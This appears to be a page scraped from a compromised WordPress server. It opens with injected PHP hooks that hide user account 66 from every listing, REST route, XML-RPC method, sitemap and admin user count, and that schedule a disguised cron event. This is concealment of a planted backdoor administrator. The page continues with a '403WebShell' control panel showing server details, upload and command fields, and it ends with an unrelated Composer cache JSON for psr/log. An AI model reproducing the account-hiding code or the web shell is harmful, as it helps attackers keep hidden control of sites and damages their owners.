add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-psr~log.json
{"minified":"composer/2.0","packages":{"psr/log":[{"name":"psr/log","description":"Common interface for logging libraries","keywords":["log","psr","psr-3"],"homepage":"https://github.com/php-fig/log","version":"3.0.2","version_normalized":"3.0.2.0","license":["MIT"],"authors":[{"name":"PHP-FIG","homepage":"https://www.php-fig.org/"}],"source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"f16e1d5863e37f8d8c2a01719f5b34baa2b714d3"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/f16e1d5863e37f8d8c2a01719f5b34baa2b714d3","type":"zip","shasum":"","reference":"f16e1d5863e37f8d8c2a01719f5b34baa2b714d3"},"type":"library","support":{"source":"https://github.com/php-fig/log/tree/3.0.2"},"funding":[],"time":"2024-09-11T13:17:53+00:00","autoload":{"psr-4":{"Psr\\Log\\":"src"}},"extra":{"branch-alias":{"dev-master":"3.x-dev"}},"require":{"php":">=8.0.0"}},{"version":"3.0.1","version_normalized":"3.0.1.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"79dff0b268932c640297f5208d6298f71855c03e"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/79dff0b268932c640297f5208d6298f71855c03e","type":"zip","shasum":"","reference":"79dff0b268932c640297f5208d6298f71855c03e"},"support":{"source":"https://github.com/php-fig/log/tree/3.0.1"},"time":"2024-08-21T13:31:24+00:00"},{"version":"3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"fe5ea303b0887d5caefd3d431c3e61ad47037001"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/fe5ea303b0887d5caefd3d431c3e61ad47037001","type":"zip","shasum":"","reference":"fe5ea303b0887d5caefd3d431c3e61ad47037001"},"support":{"source":"https://github.com/php-fig/log/tree/3.0.0"},"time":"2021-07-14T16:46:02+00:00"},{"version":"2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"ef29f6d262798707a9edd554e2b82517ef3a9376"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/ef29f6d262798707a9edd554e2b82517ef3a9376","type":"zip","shasum":"","reference":"ef29f6d262798707a9edd554e2b82517ef3a9376"},"support":{"source":"https://github.com/php-fig/log/tree/2.0.0"},"time":"2021-07-14T16:41:46+00:00","extra":{"branch-alias":{"dev-master":"2.0.x-dev"}}},{"version":"1.1.4","version_normalized":"1.1.4.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"d49695b909c3b7628b6289db5479a1c204601f11"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/d49695b909c3b7628b6289db5479a1c204601f11","type":"zip","shasum":"","reference":"d49695b909c3b7628b6289db5479a1c204601f11"},"support":{"source":"https://github.com/php-fig/log/tree/1.1.4"},"time":"2021-05-03T11:20:27+00:00","autoload":{"psr-4":{"Psr\\Log\\":"Psr/Log/"}},"extra":{"branch-alias":{"dev-master":"1.1.x-dev"}},"require":{"php":">=5.3.0"}},{"version":"1.1.3","version_normalized":"1.1.3.0","authors":[{"name":"PHP-FIG","homepage":"http://www.php-fig.org/"}],"source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"0f73288fd15629204f9d42b7055f72dacbe811fc"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/0f73288fd15629204f9d42b7055f72dacbe811fc","type":"zip","shasum":"","reference":"0f73288fd15629204f9d42b7055f72dacbe811fc"},"support":{"source":"https://github.com/php-fig/log/tree/1.1.3"},"time":"2020-03-23T09:12:05+00:00"},{"version":"1.1.2","version_normalized":"1.1.2.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"446d54b4cb6bf489fc9d75f55843658e6f25d801"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/446d54b4cb6bf489fc9d75f55843658e6f25d801","type":"zip","shasum":"","reference":"446d54b4cb6bf489fc9d75f55843658e6f25d801"},"support":{"source":"https://github.com/php-fig/log/tree/1.1.2"},"time":"2019-11-01T11:05:21+00:00","funding":"__unset"},{"version":"1.1.1","version_normalized":"1.1.1.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"bf73deb2b3b896a9d9c75f3f0d88185d2faa27e2"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/bf73deb2b3b896a9d9c75f3f0d88185d2faa27e2","type":"zip","shasum":"","reference":"bf73deb2b3b896a9d9c75f3f0d88185d2faa27e2"},"support":{"source":"https://github.com/php-fig/log/tree/1.1.1"},"time":"2019-10-25T08:06:51+00:00"},{"version":"1.1.0","version_normalized":"1.1.0.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"6c001f1daafa3a3ac1d8ff69ee4db8e799a654dd"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/6c001f1daafa3a3ac1d8ff69ee4db8e799a654dd","type":"zip","shasum":"","reference":"6c001f1daafa3a3ac1d8ff69ee4db8e799a654dd"},"support":{"source":"https://github.com/php-fig/log/tree/master"},"time":"2018-11-20T15:27:04+00:00","extra":{"branch-alias":{"dev-master":"1.0.x-dev"}}},{"version":"1.0.2","version_normalized":"1.0.2.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"4ebe3a8bf773a19edfe0a84b6585ba3d401b724d"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/4ebe3a8bf773a19edfe0a84b6585ba3d401b724d","type":"zip","shasum":"","reference":"4ebe3a8bf773a19edfe0a84b6585ba3d401b724d"},"time":"2016-10-10T12:19:37+00:00"},{"version":"1.0.1","version_normalized":"1.0.1.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"5277094ed527a1c4477177d102fe4c53551953e0"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/5277094ed527a1c4477177d102fe4c53551953e0","type":"zip","shasum":"","reference":"5277094ed527a1c4477177d102fe4c53551953e0"},"support":{"source":"https://github.com/php-fig/log/tree/1.0.1"},"time":"2016-09-19T16:02:08+00:00"},{"homepage":"","version":"1.0.0","version_normalized":"1.0.0.0","source":{"url":"https://github.com/php-fig/log.git","type":"git","reference":"fe0936ee26643249e916849d48e3a51d5f5e278b"},"dist":{"url":"https://api.github.com/repos/php-fig/log/zipball/fe0936ee26643249e916849d48e3a51d5f5e278b","type":"zip","shasum":"","reference":"fe0936ee26643249e916849d48e3a51d5f5e278b"},"support":{"issues":"https://github.com/php-fig/log/issues","source":"https://github.com/php-fig/log/tree/1.0.0"},"time":"2012-12-21T11:40:51+00:00","autoload":{"psr-0":{"Psr\\Log\\":""}},"extra":"__unset","require":"__unset"}]},"security-advisories":[],"last-modified":"Wed, 11 Sep 2024 13:21:17 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit